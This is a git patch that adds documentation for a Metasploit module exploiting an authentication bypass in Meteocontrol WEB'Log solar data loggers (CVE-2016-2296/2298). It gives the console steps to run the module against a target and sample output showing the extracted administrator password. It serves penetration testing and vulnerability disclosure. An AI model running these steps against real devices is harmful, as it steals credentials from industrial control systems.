From dc33d417e029e8970342eb257343397164a9745f Mon Sep 17 00:00:00 2001
From: juushya <KarnGaneshen@gmail.com>
Date: Sun, 8 Jan 2017 13:44:38 +0530
Subject: [PATCH] Add Meteocontrol Weblog Doc - PR #7790

---
 .../http/meteocontrol_weblog_extractadmin.md  | 54 +++++++++++++++++++
 1 file changed, 54 insertions(+)
 create mode 100644 documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md

diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
new file mode 100644
index 0000000000..68d227a58d
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
@@ -0,0 +1,54 @@
+Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
+
+Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
+
+## Verification Steps
+
+1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
+msf auxiliary(meteocontrol_weblog_extractadmin) > info
+
+       Name: MeteoControl WEBLog Password Extractor
+     Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+
+Provided by:
+  Karn Ganeshen <KarnGaneshen@gmail.com>
+
+Basic options:
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                    yes       The target address range or CIDR identifier
+  RPORT    8080             yes       The target port
+  SSL      false            no        Negotiate SSL/TLS for outgoing connections
+  THREADS  1                yes       The number of concurrent threads
+  VHOST                     no        HTTP server virtual host
+
+Description:
+  This module exploits an authentication bypass vulnerability in 
+  Meteocontrol WEBLog (all models) to extract Administrator password 
+  for the device management portal.
+
+References:
+  https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
+  http://cvedetails.com/cve/2016-2296/
+  http://cvedetails.com/cve/2016-2298/
+
+msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
+msf auxiliary(meteocontrol_weblog_extractadmin) > run
+
+[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal...
+[*] 1.2.3.4:8080 - Attempting to extract Administrator password...
+[+] 1.2.3.4:8080 - Password is password
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```